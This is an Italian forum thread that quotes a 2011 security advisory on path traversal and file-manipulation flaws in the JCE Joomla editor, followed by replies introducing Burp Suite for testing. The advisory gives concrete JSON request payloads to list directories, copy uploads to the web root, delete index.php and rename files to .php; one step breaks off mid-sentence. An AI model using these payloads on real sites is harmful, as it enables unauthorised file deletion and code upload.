Autore Topic: JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities (Letto 3980 volte)

jeckodevelopment · « **il:** 28 Ago 2011, 12:24:59 »

Diverse vulnerabilità trovate nel popolare editor JCE versione 2.0.1.0 e precedenti.
Non è stata ancora rilasciata una patch correttiva, si consiglia di visitare il sito web dello sviluppatore.

Temporaneamente si consiglia di restringere i permessi in scrittura (quindi all'editor) esclusivamente agli utenti fidati in attesa della nuova versione.

Citazione

#######################################
#
# Title: JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities
# Vendor: www.joomlacontenteditor.net
# Exploit: Available
# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager
1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)
# Impact: High
# Fix: N/A
###################################################################################

####################
1. Description:
####################

JCE is an extension for Joomla!, that provides you with a set of
wysiwyg editor tools that makes the job of writing articles for your
Joomla! site a little bit easier.
In a nutshell, it provides access to many of the features you may
be used to using in Word or OpenOffice etc.

####################
2. Vulnerabilities:
####################

2.1. Path Traversal Flaws. Path Traversal in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
2.1.1. Exploit:
Check the exploit/POC section.

2.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",
"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
2.2.1. Exploit:
Check the exploit/POC section.

2.3. Unsafe function Flaws. Attackers can use unsafe function
called "folderRename" for changing Image type extension (.jpg, .gif,
.png & etc.) to any extension like .htaccess or .php in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
2.3.1. Exploit:
Check the exploit/POC section.

####################
3. Exploits/PoCs:
####################

Original Exploit URL: http://www.bugreport.ir/78/exploit.htm

3.1. Path Traversal Flaws. Path Traversal in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
-------------
Path Traversal and see all directories:
Step 1 +--> Click on root (left bar)
Step 2 +--> Use Proxy (like burp) for changing path:

json={"fn":"getItems","args":["/","all",0,""]}
to
json={"fn":"getItems","args":["../../","all",0,""]}

-------------

3.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",
"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
-------------
For uploading file:
Step 1 +--> Upload a file with image type extension like azizi.jpg
Step 2 +--> Click on root (left bar)
Step 3 +--> Use Proxy (like burp) and change "json" parameter
to json={"fn":"fileCopy","args":["/azizi.jpg","../../"]}

Now azizi.jpg copied to root directory.

For deleting file:
Step 1 +--> Click on root (left bar)
Step 2 +--> Use Proxy (like burp) and change "json" parameter
to json={"fn":"fileDelete","args":"../../index.php"}

Now index.php has been deleted.
-------------

3.3. Unsafe function Flaws. Attackers can use unsafe function for
changing Image type extension (.jpg, .gif, .png & etc.) to any extension
like .htaccess or .php in "Image Manager", "Media Manager", "Template
Manager" and "File Manager" section.
-------------
For uploading file with executable extension:
Step 1 +--> Upload a file with image type extension like azizi.jpg
Step 2 +--> Click on root (left bar)
Step 3 +--> Use Proxy (like burp) and change "json" p

####################
4. Solution:
####################

Restricting and granting only trusted users having access to
resources and wait for vender patch.

mau_develop · « **Risposta #1 il:** 28 Ago 2011, 14:42:39 »

hacking 2.0!

json={"fn":"getItems","args":["/","all",0,""]}

adesso incominciano a scovarle... ma sai quante ce ne sono sulle vecchie versioni quando nessuno si faceva il minimo problema di sicurezza usando ajax...

bel tool anche burp suite, veramente efficace

M.

jeckodevelopment · « **Risposta #2 il:** 28 Ago 2011, 16:23:27 »

Citazione da: mau_develop - 28 Ago 2011, 14:42:39

adesso incominciano a scovarle... ma sai quante ce ne sono sulle vecchie versioni quando nessuno si faceva il minimo problema di sicurezza usando ajax...

per questo è importante sottolineare la necessità di utilizzare sempre la versione più recente di Joomla e delle estensioni

mau_develop · « **Risposta #3 il:** 30 Ago 2011, 19:00:07 »

Volevo fare un tutorial su questa vulnerabilità, così da far vedere come ci si muove per scovarle maaa.... il tempo!... azz non ce n'è mai... però due cosucce per chi si vuole cimentare, visto che sono questo tipo di problemi quelli più ricercati al momento, almeno sapere come testare...

In quella segnalata da Jecko è stato usato burp, ma ce ne sono altri altrettanto validi... burp però è semplice ...fa 100 cose ma le fa bene

Che cos'è burp? E' una suite che esiste sia in versione free che a pagamento, la differenza sta che se la usate per lavoro quella a pagamento ha un po' di features in più che semplificano la vita.
Burp è dotato di proxi e praticamente durante il test sul vostro sito fa da man in the middle tra il vostro browser e , diciamo, la vittima.
Si scarica sul sito del produttore la versione free, dovete avere java installato sulla macchina.
Su win... non me ne parlate nemmeno, su lnx si lancia portandosi nella root dell'eseguibile e col solito java -jar nome
A questo punto avete già un proxi in locale in ascolto sulla porta 8080 ... per ora non dovete fare null'altro.
Ora dovete andare su ffox nelle impostazioni di rete e dirigere tutto su 127.0.0.1 porta 8080.
Cosa abbiamo fatto? Ogni richiesta del nostro browser verrà intercettata da burp (proxi) e tenuta in stand by fino a che non farete voi il forward col pulsante apposito.
Sotto avete delle finestre dove vi vengono fatti veder tutti i parametri in chiaro, anche quelli che normalmente sembrano invisibili... vedrete le richieste dell'adv ... e tutto ciò che viene spedito con il vostro click.
Ovviamente avete la possibilità di manipolare tutti gli header e i parametri prima di forwardarli e valutarne la risposta.

Questi tool vengono considerati da "hacker" quando nella realtà sono fatti proprio per il contrario di quello che si intende con il termine hacker. Non è pericoloso divulgarne l'esistenza ed incitarne l'uso perchè non sono la bacchetta magica per il pischelletto... non appare il flash rosso "hai vinto", ma semplicemente delle "risposte" o degli "errori" che all'occhio dello sviluppatore solitamente non sfuggono... ovvio che non è detto che ogni errore non gestito sia una vulnerabilità ma è comunque buona pratica che qs non succeda.

Burp ovviamente non è solo quello che ho detto io, se vi interessa potete approfondire, in rete si trova materiale e anche in italiano...
Se vi ho detto che fa 100 cose... io ve ne ho spiegata mezza

nella speranza che qualcuno adotti questi strumenti come fase immancabile nel ciclo di sviluppo

M.

Autore Topic: JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities (Letto 3980 volte)

jeckodevelopment

JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities

mau_develop

Re:JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities

jeckodevelopment

Re:JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities

mau_develop

Re:JCE Joomla Component <= 2.0.1.0 Multiple Vulnerabilities